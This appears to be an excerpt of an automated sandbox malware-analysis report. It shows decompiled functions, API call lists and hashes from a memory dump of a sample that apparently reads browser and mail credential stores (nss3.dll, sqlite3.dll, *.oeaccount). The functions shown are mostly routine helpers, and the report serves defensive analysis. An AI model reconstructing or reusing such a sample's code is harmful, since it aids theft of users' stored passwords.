                                                                                                                                                                  • Instruction ID: 10e230c6dca09e0a93cf8d60ed085072b0d540c64d6ff1ff1f1df815401d523a
                                                                                                                                                                  • Opcode Fuzzy Hash: 7edb754ddf4429fd3ce2b30709e1edacb08f523e3e7d14c7b467b5b93d7c181c
                                                                                                                                                                  • Instruction Fuzzy Hash: 6331E4718492C5AFCB118B6C80417EEFFA24F62304F08869AC2D546353C26DA5CAC39A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040BE4E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                                  			E0040BE4E(signed int __eax, void* __ecx, void* _a4) {
				unsigned int _t23;
				signed int _t25;
				unsigned int _t34;
				unsigned int _t36;
				void* _t40;
				unsigned int _t45;
				void* _t46;
				int _t47;
				void* _t48;
				void* _t50;

				_t48 = __ecx;
				_t34 = __eax;
				_t23 =  *(__ecx + 0x10);
				_t36 = _t23 + __eax * 8;
				 *(__ecx + 0x10) = _t36;
				if(_t36 < _t23) {
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
				}
				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
				_t25 = _t23 >> 0x00000003 & 0x0000003f;
				if(_t25 == 0) {
					L6:
					if(_t34 >= 0x40) {
						_t45 = _t34 >> 6;
						do {
							memcpy(_t48 + 0x18, _a4, 0x40);
							_t50 = _t50 + 0xc;
							E0040BF6B(_t48 + 0x18, _t48);
							_a4 = _a4 + 0x40;
							_t34 = _t34 - 0x40;
							_t45 = _t45 - 1;
						} while (_t45 != 0);
					}
					_push(_t34);
					_push(_a4);
					_push(_t48 + 0x18);
				} else {
					_t46 = 0x40;
					_t47 = _t46 - _t25;
					_t40 = _t48 + 0x18 + _t25;
					if(_t34 >= _t47) {
						memcpy(_t40, _a4, _t47);
						_t50 = _t50 + 0xc;
						E0040BF6B(_t48 + 0x18, _t48);
						_a4 = _a4 + _t47;
						_t34 = _t34 - _t47;
						goto L6;
					} else {
						_push(_t34);
						_push(_a4);
						_push(_t40);
					}
				}
				return memcpy();
			}













                                                                                                                                                                  0x0040be53
                                                                                                                                                                  0x0040be55
                                                                                                                                                                  0x0040be57
                                                                                                                                                                  0x0040be5a
                                                                                                                                                                  0x0040be60
                                                                                                                                                                  0x0040be63
                                                                                                                                                                  0x0040be65
                                                                                                                                                                  0x0040be65
                                                                                                                                                                  0x0040be6d
                                                                                                                                                                  0x0040be73
                                                                                                                                                                  0x0040be76
                                                                                                                                                                  0x0040bea8
                                                                                                                                                                  0x0040beab
                                                                                                                                                                  0x0040beaf
                                                                                                                                                                  0x0040beb2
                                                                                                                                                                  0x0040bebb
                                                                                                                                                                  0x0040bec0
                                                                                                                                                                  0x0040bec8
                                                                                                                                                                  0x0040becd
                                                                                                                                                                  0x0040bed1
                                                                                                                                                                  0x0040bed4
                                                                                                                                                                  0x0040bed4
                                                                                                                                                                  0x0040beb2
                                                                                                                                                                  0x0040bed7
                                                                                                                                                                  0x0040bed8
                                                                                                                                                                  0x0040bede
                                                                                                                                                                  0x0040be78
                                                                                                                                                                  0x0040be7a
                                                                                                                                                                  0x0040be7b
                                                                                                                                                                  0x0040be7f
                                                                                                                                                                  0x0040be83
                                                                                                                                                                  0x0040be91
                                                                                                                                                                  0x0040be96
                                                                                                                                                                  0x0040be9e
                                                                                                                                                                  0x0040bea3
                                                                                                                                                                  0x0040bea6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040be85
                                                                                                                                                                  0x0040be85
                                                                                                                                                                  0x0040be86
                                                                                                                                                                  0x0040be89
                                                                                                                                                                  0x0040be89
                                                                                                                                                                  0x0040be83
                                                                                                                                                                  0x0040beeb

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 3510742995-2766056989
                                                                                                                                                                  • Opcode ID: 49a5a345e8207f48ba7b20f9c3d546e09529423d2927eee968959314de42fdf5
                                                                                                                                                                  • Instruction ID: eb902c52722b89a171555a0eccdb346c2cc9b7794a0320b873d5afd3574b0f46
                                                                                                                                                                  • Opcode Fuzzy Hash: 49a5a345e8207f48ba7b20f9c3d546e09529423d2927eee968959314de42fdf5
                                                                                                                                                                  • Instruction Fuzzy Hash: 201138B29007096BCB288E25C8809EB77A9EF54344700063FFE0696691E7759E95C7DC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B84C, Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040B84C(void* __ecx, void* _a4) {
				struct _WNDCLASSA _v44;
				void _v299;
				char _v300;
				void _v555;
				char _v556;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t27;
				CHAR* _t32;
				struct HWND__* _t34;
				void* _t36;
				void* _t41;

				_t36 = __ecx;
				_v556 = 0;
				memset( &_v555, 0, 0xff);
				_v300 = 0;
				memset( &_v299, 0, 0xff);
				_t27 =  *0x417b94; // 0x400000
				_t41 = _a4;
				_v44.hInstance = _t27;
				_v44.hIcon =  *((intOrPtr*)(_t41 + 0x104));
				_v44.lpszClassName = _t41 + 4;
				_v44.style = 0;
				_v44.lpfnWndProc = E0040174E;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassA( &_v44);
				_t32 = E004019DA(_t36,  &_v300, 0x413450);
				_t34 = CreateWindowExA(0, E004019DA(_t36,  &_v556, 0x414478), _t32, 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x417b94, _t41);
				 *(_a4 + 0x108) = _t34;
				return _t34;
			}















                                                                                                                                                                  0x0040b84c
                                                                                                                                                                  0x0040b868
                                                                                                                                                                  0x0040b86e
                                                                                                                                                                  0x0040b87c
                                                                                                                                                                  0x0040b882
                                                                                                                                                                  0x0040b887
                                                                                                                                                                  0x0040b88c
                                                                                                                                                                  0x0040b88f
                                                                                                                                                                  0x0040b898
                                                                                                                                                                  0x0040b89e
                                                                                                                                                                  0x0040b8a8
                                                                                                                                                                  0x0040b8ab
                                                                                                                                                                  0x0040b8b2
                                                                                                                                                                  0x0040b8b5
                                                                                                                                                                  0x0040b8b8
                                                                                                                                                                  0x0040b8bb
                                                                                                                                                                  0x0040b8c2
                                                                                                                                                                  0x0040b8c5
                                                                                                                                                                  0x0040b8f0
                                                                                                                                                                  0x0040b908
                                                                                                                                                                  0x0040b913
                                                                                                                                                                  0x0040b91b

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$ClassCreateRegisterWindowstrncat
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3664037073-0
                                                                                                                                                                  • Opcode ID: be5346cb48c8cedca28fb9c953b908c4a3ca165af802d2e293ff076a17b9cc61
                                                                                                                                                                  • Instruction ID: a433a9f07fbe34a5cd63bc5fe357f5218a2175739f92369553503b68093de8d1
                                                                                                                                                                  • Opcode Fuzzy Hash: be5346cb48c8cedca28fb9c953b908c4a3ca165af802d2e293ff076a17b9cc61
                                                                                                                                                                  • Instruction Fuzzy Hash: F1211FB5C01218AFDB50DF95DD85ADFBBBCEB08354F0040BAE549B3251C778AE848BA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004070D9, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E004070D9(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L00412090();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L00412096();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                                                                  0x004070d9
                                                                                                                                                                  0x004070da
                                                                                                                                                                  0x004070da
                                                                                                                                                                  0x004070dd
                                                                                                                                                                  0x004070e1
                                                                                                                                                                  0x004070f4
                                                                                                                                                                  0x004070f4
                                                                                                                                                                  0x004070f8
                                                                                                                                                                  0x004070fa
                                                                                                                                                                  0x00407100
                                                                                                                                                                  0x00407101
                                                                                                                                                                  0x00407104
                                                                                                                                                                  0x0040710d
                                                                                                                                                                  0x0040710e
                                                                                                                                                                  0x00407113
                                                                                                                                                                  0x0040711d
                                                                                                                                                                  0x0040711f
                                                                                                                                                                  0x00407124
                                                                                                                                                                  0x0040712b
                                                                                                                                                                  0x00407135
                                                                                                                                                                  0x00407137
                                                                                                                                                                  0x00407138
                                                                                                                                                                  0x0040713d
                                                                                                                                                                  0x00407144
                                                                                                                                                                  0x0040714d
                                                                                                                                                                  0x004070e3
                                                                                                                                                                  0x004070e3
                                                                                                                                                                  0x004070e5
                                                                                                                                                                  0x004070e7
                                                                                                                                                                  0x004070ec
                                                                                                                                                                  0x004070ed
                                                                                                                                                                  0x004070f0
                                                                                                                                                                  0x004070f2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004070f2
                                                                                                                                                                  0x0040715d
                                                                                                                                                                  0x00407160
                                                                                                                                                                  0x00407169
                                                                                                                                                                  0x00407169
                                                                                                                                                                  0x00407152
                                                                                                                                                                  0x00407156

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1865533344-0
                                                                                                                                                                  • Opcode ID: e4c1b742036f6387abe750b9dffb2ef64d195688e0a077fc4da9177e63e0e53c
                                                                                                                                                                  • Instruction ID: 17b98b22fb48c4f462205fa6a58e9a56533f9d3233289d57114c66ebe089a08a
                                                                                                                                                                  • Opcode Fuzzy Hash: e4c1b742036f6387abe750b9dffb2ef64d195688e0a077fc4da9177e63e0e53c
                                                                                                                                                                  • Instruction Fuzzy Hash: A6113D716046019FD328DF2DC981A27F7E6FF98304B20892EE59AC7385DA75E841CB55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F61F, Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                  			E0040F61F(char* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v304;
				char* _t18;
				char* _t22;
				char* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040F5A7;
					_v16 = __esi;
					__imp__SHBrowseForFolderA(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v304;
						__imp__SHGetPathFromIDListA(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							strcpy(__esi,  &_v304);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                                                                                  0x0040f629
                                                                                                                                                                  0x0040f62d
                                                                                                                                                                  0x0040f62f
                                                                                                                                                                  0x0040f637
                                                                                                                                                                  0x0040f63c
                                                                                                                                                                  0x0040f642
                                                                                                                                                                  0x0040f646
                                                                                                                                                                  0x0040f64a
                                                                                                                                                                  0x0040f64d
                                                                                                                                                                  0x0040f650
                                                                                                                                                                  0x0040f657
                                                                                                                                                                  0x0040f65e
                                                                                                                                                                  0x0040f661
                                                                                                                                                                  0x0040f667
                                                                                                                                                                  0x0040f66b
                                                                                                                                                                  0x0040f66d
                                                                                                                                                                  0x0040f675
                                                                                                                                                                  0x0040f67d
                                                                                                                                                                  0x0040f687
                                                                                                                                                                  0x0040f688
                                                                                                                                                                  0x0040f68e
                                                                                                                                                                  0x0040f68f
                                                                                                                                                                  0x0040f696
                                                                                                                                                                  0x0040f699
                                                                                                                                                                  0x0040f69f
                                                                                                                                                                  0x0040f69f
                                                                                                                                                                  0x0040f6a2
                                                                                                                                                                  0x0040f6a7

                                                                                                                                                                  APIs
                                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 0040F62F
                                                                                                                                                                  • SHBrowseForFolderA.SHELL32(?), ref: 0040F661
                                                                                                                                                                  • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F675
                                                                                                                                                                  • strcpy.MSVCRT(?,?), ref: 0040F688
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BrowseFolderFromListMallocPathstrcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 409945605-0
                                                                                                                                                                  • Opcode ID: 46f915da22a8394e3ccfb75a6a67a5d073b6093023bbcacd313ffdd2da9d0fc7
                                                                                                                                                                  • Instruction ID: b2d480601b656eadb7f9024a04999e6b50b11c93cc119ce3783244db306e4add
                                                                                                                                                                  • Opcode Fuzzy Hash: 46f915da22a8394e3ccfb75a6a67a5d073b6093023bbcacd313ffdd2da9d0fc7
                                                                                                                                                                  • Instruction Fuzzy Hash: 5811F7B5900208AFCB10DFA9D9889EEBBF8FB49315F10447AE905E7250D739DA46CF64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00411C05, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E00411C05(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				void* _t10;
				void* _t13;
				char* _t15;
				void* _t21;
				void* _t24;
				long _t27;

				_t10 = E00405ED5(_a8);
				_pop(_t21);
				_a8 = _t10;
				if(_t10 == 0xffffffff) {
					return 0;
				}
				_t27 = GetFileSize(_t10, 0);
				_t3 = _t27 + 5; // 0x5
				_t13 = _t3;
				_push(_t13);
				L00412090();
				_t24 = _t13;
				E00406725(_t21, _a8, _t24, _t27);
				_t15 = _t24 + _t27;
				 *_t15 = 0;
				 *((char*)(_t15 + 1)) = 0;
				 *((char*)(_t15 + 2)) = 0;
				E00411C76(_a4, _t24);
				CloseHandle(_a8);
				if(_t24 != 0) {
					_push(_t24);
					L00412096();
				}
				return 1;
			}









                                                                                                                                                                  0x00411c0b
                                                                                                                                                                  0x00411c13
                                                                                                                                                                  0x00411c14
                                                                                                                                                                  0x00411c17
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00411c70
                                                                                                                                                                  0x00411c24
                                                                                                                                                                  0x00411c26
                                                                                                                                                                  0x00411c26
                                                                                                                                                                  0x00411c29
                                                                                                                                                                  0x00411c2a
                                                                                                                                                                  0x00411c2f
                                                                                                                                                                  0x00411c36
                                                                                                                                                                  0x00411c3b
                                                                                                                                                                  0x00411c41
                                                                                                                                                                  0x00411c44
                                                                                                                                                                  0x00411c48
                                                                                                                                                                  0x00411c50
                                                                                                                                                                  0x00411c58
                                                                                                                                                                  0x00411c60
                                                                                                                                                                  0x00411c62
                                                                                                                                                                  0x00411c63
                                                                                                                                                                  0x00411c68
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D064,00000000,0040D972,?,?,00000104,00000000,?,0040D972,?,00000000), ref: 00411C1E
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00411C2A
                                                                                                                                                                    • Part of subcall function 00406725: ReadFile.KERNEL32(?,0041141B,?,00000000,00000000,?,?,004112BE,0041141B,00000000,-00000002,?,0041133F,?,?,*.oeaccount), ref: 0040673C
                                                                                                                                                                  • CloseHandle.KERNEL32(0040D972,00000000,?,0040D972,?,00000000,?,?,?,?,?,?), ref: 00411C58
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00411C63
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1968906679-0
                                                                                                                                                                  • Opcode ID: 33877706b5d6ce5a60bd243af652b3227341b80957e1355f9b7c322417ce527a
                                                                                                                                                                  • Instruction ID: 7eee50cd159b1862f9f77aaf36d5f43b0d65e01e2e9cd2c6863135ac6fea6ec1
                                                                                                                                                                  • Opcode Fuzzy Hash: 33877706b5d6ce5a60bd243af652b3227341b80957e1355f9b7c322417ce527a
                                                                                                                                                                  • Instruction Fuzzy Hash: 7801A231004104AAD711AF35DC09FDB3FA99F46374F15C12AF5188B2A1EB7A8650C7A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A5A1, Relevance: 6.0, APIs: 4, Instructions: 45stringwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                  			E0040A5A1(void* __esi) {
				void* _v260;
				char _v516;
				void* __ebx;
				char* _t16;
				signed short _t25;
				signed short _t27;
				void* _t28;

				_t28 = __esi;
				_push(E004087B1( *((intOrPtr*)(__esi + 0x370))));
				_t25 = 4;
				sprintf( &_v260, E00407A69(_t25));
				_t16 = E00408D4B( *((intOrPtr*)(__esi + 0x370)), 0);
				if(_t16 > 0) {
					_push(_t16);
					_t27 = 5;
					sprintf( &_v516, E00407A69(_t27));
					_t16 = strcat( &_v260,  &_v516);
				}
				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
				}
				return _t16;
			}










                                                                                                                                                                  0x0040a5a1
                                                                                                                                                                  0x0040a5b6
                                                                                                                                                                  0x0040a5b9
                                                                                                                                                                  0x0040a5c7
                                                                                                                                                                  0x0040a5d7
                                                                                                                                                                  0x0040a5de
                                                                                                                                                                  0x0040a5e0
                                                                                                                                                                  0x0040a5e3
                                                                                                                                                                  0x0040a5f1
                                                                                                                                                                  0x0040a604
                                                                                                                                                                  0x0040a609
                                                                                                                                                                  0x0040a614
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a62a
                                                                                                                                                                  0x0040a631

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00407A69: LoadStringA.USER32 ref: 00407B32
                                                                                                                                                                    • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040A5C7
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040A62A
                                                                                                                                                                    • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76D24DE0), ref: 00407AE4
                                                                                                                                                                    • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040A5F1
                                                                                                                                                                  • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A604
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 919693953-0
                                                                                                                                                                  • Opcode ID: 958ab865ac69a3c4c3d9128656c309624dbea8e97793038db77fe03c7bb4008b
                                                                                                                                                                  • Instruction ID: 49acf1ec04927684f0e14b468f671fa247d4e43980f6f5764d7eadf86f6a0ac4
                                                                                                                                                                  • Opcode Fuzzy Hash: 958ab865ac69a3c4c3d9128656c309624dbea8e97793038db77fe03c7bb4008b
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A01DBB190030467D720F7B4CD86FDB73ACAB04304F04046FB755F61C2DAB9E6948A69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040FA2B, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E0040FA2B(char* _a4) {
				void _v267;
				char _v268;
				int _t12;
				signed int _t16;

				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t12 = strlen(_a4);
				_t5 = strlen("sqlite3.dll") + 1; // 0x1
				if(_t12 + _t5 >= 0x104) {
					_v268 = 0;
				} else {
					E004062B7( &_v268, _a4, "sqlite3.dll");
				}
				_t16 = E00406155( &_v268);
				asm("sbb eax, eax");
				return  ~( ~_t16);
			}







                                                                                                                                                                  0x0040fa46
                                                                                                                                                                  0x0040fa4d
                                                                                                                                                                  0x0040fa55
                                                                                                                                                                  0x0040fa67
                                                                                                                                                                  0x0040fa70
                                                                                                                                                                  0x0040fa85
                                                                                                                                                                  0x0040fa72
                                                                                                                                                                  0x0040fa7c
                                                                                                                                                                  0x0040fa82
                                                                                                                                                                  0x0040fa93
                                                                                                                                                                  0x0040fa9c
                                                                                                                                                                  0x0040faa3

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040FA4D
                                                                                                                                                                  • strlen.MSVCRT ref: 0040FA55
                                                                                                                                                                  • strlen.MSVCRT ref: 0040FA62
                                                                                                                                                                    • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                                                                                                                                                                    • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strlen$memsetstrcatstrcpy
                                                                                                                                                                  • String ID: sqlite3.dll
                                                                                                                                                                  • API String ID: 1581230619-1155512374
                                                                                                                                                                  • Opcode ID: 16108ddf4f13ffc1d1035336796fcbbad104ce4c6981e8ccb6bc320039be4e03
                                                                                                                                                                  • Instruction ID: 4f80a8773c1d4988f6668b9143c1107d12609c3bb00905d80200812c675c4c4f
                                                                                                                                                                  • Opcode Fuzzy Hash: 16108ddf4f13ffc1d1035336796fcbbad104ce4c6981e8ccb6bc320039be4e03
                                                                                                                                                                  • Instruction Fuzzy Hash: F6F0427250C1186EDB20E769DC45FC977AC8F60318F1000B7F589E60C2DAF8D6C58668
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409A67, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00409A67(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t15;
				intOrPtr* _t24;
				char* _t26;

				_t24 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
				_t26 =  &_v260;
				E0040918B(_t26, _t15);
				sprintf( &_v516, "</%s>\r\n", _t26);
				return E00405F07(_a4,  &_v516);
			}











                                                                                                                                                                  0x00409a81
                                                                                                                                                                  0x00409a83
                                                                                                                                                                  0x00409a8a
                                                                                                                                                                  0x00409a99
                                                                                                                                                                  0x00409aa0
                                                                                                                                                                  0x00409aac
                                                                                                                                                                  0x00409ab0
                                                                                                                                                                  0x00409ab6
                                                                                                                                                                  0x00409aca
                                                                                                                                                                  0x00409ae4

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00409A8A
                                                                                                                                                                  • memset.MSVCRT ref: 00409AA0
                                                                                                                                                                    • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
                                                                                                                                                                    • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
                                                                                                                                                                  • sprintf.MSVCRT ref: 00409ACA
                                                                                                                                                                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76D24DE0,00000000,?,?,00409460,00000001,00413B1C,76D24DE0), ref: 00405F21
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                                                                                                  • String ID: </%s>
                                                                                                                                                                  • API String ID: 3202206310-259020660
                                                                                                                                                                  • Opcode ID: 637a9c7a3fbe891b17e74324215966cd4ae9ffaeb73701361f90968b62e1fe90
                                                                                                                                                                  • Instruction ID: 3d0bab8d804eeed29aac85efced1b4409724b73b0f4afa6070eee5aab36d753a
                                                                                                                                                                  • Opcode Fuzzy Hash: 637a9c7a3fbe891b17e74324215966cd4ae9ffaeb73701361f90968b62e1fe90
                                                                                                                                                                  • Instruction Fuzzy Hash: A801F9729001296BD720A259CC45FDB7B6C9F54304F0400FAB60DF3142D6B49A94CBA5
